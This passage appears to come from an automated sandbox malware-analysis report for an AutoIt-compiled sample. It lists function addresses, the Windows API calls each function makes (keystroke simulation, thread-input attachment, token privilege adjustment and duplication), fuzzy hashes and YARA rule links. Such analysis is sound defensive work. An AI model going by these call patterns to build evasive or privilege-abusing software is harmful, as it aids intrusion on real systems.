                                          APIs
                                            • Part of subcall function 00DD4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DD4D4D
                                            • Part of subcall function 00DF548B: __wfsopen.LIBCMT ref: 00DF5496
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4F6F
                                            • Part of subcall function 00DD4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DD4D02
                                            • Part of subcall function 00DD4DD0: _memmove.LIBCMT ref: 00DD4E1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: e0ee8700c62e00b384c3b6893394e338920f4d53286a605a0e57dbe29967cb6b
                                          • Instruction ID: b21d4ca7e1d0ce280fb35292eecd442d390a70b3a08012816c3eea5cb91c8b84
                                          • Opcode Fuzzy Hash: e0ee8700c62e00b384c3b6893394e338920f4d53286a605a0e57dbe29967cb6b
                                          • Instruction Fuzzy Hash: 5E11E732600709ABCB24BF74DC02F6E77A5DF80701F10882AF581A63D1DA719A059770
                                          Function 00E101AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 0e6c725c74d9e7cf92af471569b5e97f8c39a4ea5bff1b0b9166d5a6e23eea98
                                          • Instruction ID: 373d912b013f3e91050a4790d7716b70139cddc1487816a29fc693653629925d
                                          • Opcode Fuzzy Hash: 0e6c725c74d9e7cf92af471569b5e97f8c39a4ea5bff1b0b9166d5a6e23eea98
                                          • Instruction Fuzzy Hash: 5E2122B4608341DFCB24DF68C445A5ABBE0BF88314F098969F99A57721D731E889CB63
                                          Function 00DF4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock_file.LIBCMT ref: 00DF4AD6
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 5a097f08ed8025200c7b4a222ab2718fbfec17a66bada06585d44f4492988827
                                          • Instruction ID: 52b08d10dbfec43b0109d074eca3b3e502c5530b135995bfae0b7b09c22f2de1
                                          • Opcode Fuzzy Hash: 5a097f08ed8025200c7b4a222ab2718fbfec17a66bada06585d44f4492988827
                                          • Instruction Fuzzy Hash: 8BF0813194020D9BDF51AF648C063BF3665EF00329F0AC514B624AA1D1DB78CA51DF71
                                          Function 00DD4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4FDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 79607b07b283075e9eae5e68575c0bbd99e705efe8be070135d60ea6f87ba499
                                          • Instruction ID: af4e79a302d9ffa564ac6b8f48c805d3d28b7d88201f33da629fe9cae4110e4a
                                          • Opcode Fuzzy Hash: 79607b07b283075e9eae5e68575c0bbd99e705efe8be070135d60ea6f87ba499
                                          • Instruction Fuzzy Hash: E9F01571505B12CFCB349F74E994822BBE1AF043293248A3EE2D682720CB31A844DB60
                                          Function 00DF09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DF09F4
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 29b2a7cecdbbf05e743938ad5aa3c4f9f65fe6b4ef54c6409ffbcded16c3aa96
                                          • Instruction ID: 03df091f64d77f86e349d5ae0e39acfea814bfb24fedd051228063bb547a6ccc
                                          • Opcode Fuzzy Hash: 29b2a7cecdbbf05e743938ad5aa3c4f9f65fe6b4ef54c6409ffbcded16c3aa96
                                          • Instruction Fuzzy Hash: 8DE0CD769042289BC720E6589C05FFA77EDDF88791F0401F6FC0CD7354E9609C8186A0
                                          Function 00E39129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                          • Instruction ID: 0e6d14d37f1c539e4cea07846ed42fbfe543dca72f0e49f3687a01cc13f212fb
                                          • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                          • Instruction Fuzzy Hash: A2E092B0104B005FD7348A24D8547E377E0EB06319F01081CF29AA3342EBA27841C759
                                          Function 01153548 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 01153553
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                          • Instruction ID: 44fee798a37963542370a5350a66e8cbc7940be9a8090721ba7c393dede18772
                                          • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                          • Instruction Fuzzy Hash: 5DE08C70935208EBDF9ACAAC9904AA9B3A8BB053E4F004754AD36C3290D6308A10D651
                                          Function 01153518 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 01153523
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                          • Instruction ID: b341b6ef1848904966dfdde32ad7cd9336067441fe68f9321a8697dcfdd84474
                                          • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                          • Instruction Fuzzy Hash: 71D0A73192520CEBCB54CFF8AD049DD73A8E705364F004754FD35C3280D63199049750
                                          Function 00DF548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 5556e6756fbb127763fff70f35b51879f186adcc9acd15d625f6805fc5b08936
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: B7B0927684020C77DE012E82FC02A693F199B40678F808020FB0C1C162A673A6A096A9
                                          Function 01154F44 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 01154F59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                          • Instruction ID: e66cd6ab509b9912c8fb02cb8d64b4a51e30f3a91f33385fa7034de9bf3d1412
                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                          • Instruction Fuzzy Hash: 49E09A7494410DEFDB00DFA8D54969D7BB4EF04301F1006A1FD05D6680DB309A549A62
                                          Function 01154F48 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 01154F59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: e3b13795145be30290162cc31061aeab9c5f1cd7a30803acfd894291b273a45b
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: E6E0E67494410DDFDB00DFB8D54D69D7BB4EF04301F100261FD01D2280D7309D509A62

                                          Non-executed Functions

                                          Function 00E5CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00E5CE50
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E5CE91
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E5CED6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E5CF00
                                          • SendMessageW.USER32 ref: 00E5CF29
                                          • _wcsncpy.LIBCMT ref: 00E5CFA1
                                          • GetKeyState.USER32(00000011), ref: 00E5CFC2
                                          • GetKeyState.USER32(00000009), ref: 00E5CFCF
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E5CFE5
                                          • GetKeyState.USER32(00000010), ref: 00E5CFEF
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E5D018
                                          • SendMessageW.USER32 ref: 00E5D03F
                                          • SendMessageW.USER32(?,00001030,?,00E5B602), ref: 00E5D145
                                          • SetCapture.USER32(?), ref: 00E5D177
                                          • ClientToScreen.USER32(?,?), ref: 00E5D1DC
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E5D203
                                          • ReleaseCapture.USER32 ref: 00E5D20E
                                          • GetCursorPos.USER32(?), ref: 00E5D248
                                          • ScreenToClient.USER32(?,?), ref: 00E5D255
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E5D2B1
                                          • SendMessageW.USER32 ref: 00E5D2DF
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E5D31C
                                          • SendMessageW.USER32 ref: 00E5D34B
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E5D36C
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E5D37B
                                          • GetCursorPos.USER32(?), ref: 00E5D39B
                                          • ScreenToClient.USER32(?,?), ref: 00E5D3A8
                                          • GetParent.USER32(?), ref: 00E5D3C8
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E5D431
                                          • SendMessageW.USER32 ref: 00E5D462
                                          • ClientToScreen.USER32(?,?), ref: 00E5D4C0
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E5D4F0
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E5D51A
                                          • SendMessageW.USER32 ref: 00E5D53D
                                          • ClientToScreen.USER32(?,?), ref: 00E5D58F
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E5D5C3
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5D65F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 302779176-4164748364
                                          • Opcode ID: 5b2c8ab55ba34fb9905434541c37a7452d7f8f47d2c91488ea5a46d18de13a5f
                                          • Instruction ID: d200f546674231d41b0e73f6887bb2c55655f16eb7c6dd124837c82d6ce581b4
                                          • Opcode Fuzzy Hash: 5b2c8ab55ba34fb9905434541c37a7452d7f8f47d2c91488ea5a46d18de13a5f
                                          • Instruction Fuzzy Hash: 8442A230204341AFD725CF28C895FAABBF5FF48319F24191EFA55A72A0D7719858CB92
                                          Function 00E5804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E5873F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 3850602802-328681919
                                          • Opcode ID: b2fa1822d0a25925903de7d18cac1f465ed4bc8c1e1ba5bca042baf564124df2
                                          • Instruction ID: 51e4d2b44250fd20602cd22091983df06ac4c8b2c47cf92fad7ae1ed6e9e3db4
                                          • Opcode Fuzzy Hash: b2fa1822d0a25925903de7d18cac1f465ed4bc8c1e1ba5bca042baf564124df2
                                          • Instruction Fuzzy Hash: F612D470500208AFEB258F25CD49FAB7BF4EF49316F10596AF915FA1A1DF708949CB60
                                          Function 00DE710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-1798697756
                                          • Opcode ID: 150b157ffff3f190007bf0a7f7676f40f5a98c46829573d552cbffb6f1fce635
                                          • Instruction ID: 6cb842698acb4b17ba22b5c1fbb90020ce40e9a2559f284830a994670a86c1b9
                                          • Opcode Fuzzy Hash: 150b157ffff3f190007bf0a7f7676f40f5a98c46829573d552cbffb6f1fce635
                                          • Instruction Fuzzy Hash: 7C93C271A00229DFDB24DF68D881BADB7B1FF48314F25916AE945FB280E7749E81CB50
                                          Function 00DD4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 00DD4A3D
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0DA8E
                                          • IsIconic.USER32(?), ref: 00E0DA97
                                          • ShowWindow.USER32(?,00000009), ref: 00E0DAA4
                                          • SetForegroundWindow.USER32(?), ref: 00E0DAAE
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E0DAC4
                                          • GetCurrentThreadId.KERNEL32 ref: 00E0DACB
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E0DAD7
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E0DAE8
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E0DAF0
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E0DAF8
                                          • SetForegroundWindow.USER32(?), ref: 00E0DAFB
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB10
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB1B
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB25
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB2A
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB33
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB38
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0DB42
                                          • keybd_event.USER32(00000012,00000000), ref: 00E0DB47
                                          • SetForegroundWindow.USER32(?), ref: 00E0DB4A
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00E0DB71
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: c605fd4330c5f74a643fa8ee82adb94d59c35efe14176756fe32051545e36286
                                          • Instruction ID: 85f5ba42c698ef9e259da2739934b5137b1077029fbab6a7c89b51e35213361a
                                          • Opcode Fuzzy Hash: c605fd4330c5f74a643fa8ee82adb94d59c35efe14176756fe32051545e36286
                                          • Instruction Fuzzy Hash: 56315E71A40318BEEB246BA29C49F7F3E6CEB44B51F114425FA04FA1D0D6B05D50ABA0
                                          Function 00E28858 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 224COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
                                            • Part of subcall function 00E28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
                                            • Part of subcall function 00E28CC3: GetLastError.KERNEL32 ref: 00E28D47
                                          • _memset.LIBCMT ref: 00E2889B
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E288ED
                                          • CloseHandle.KERNEL32(?), ref: 00E288FE
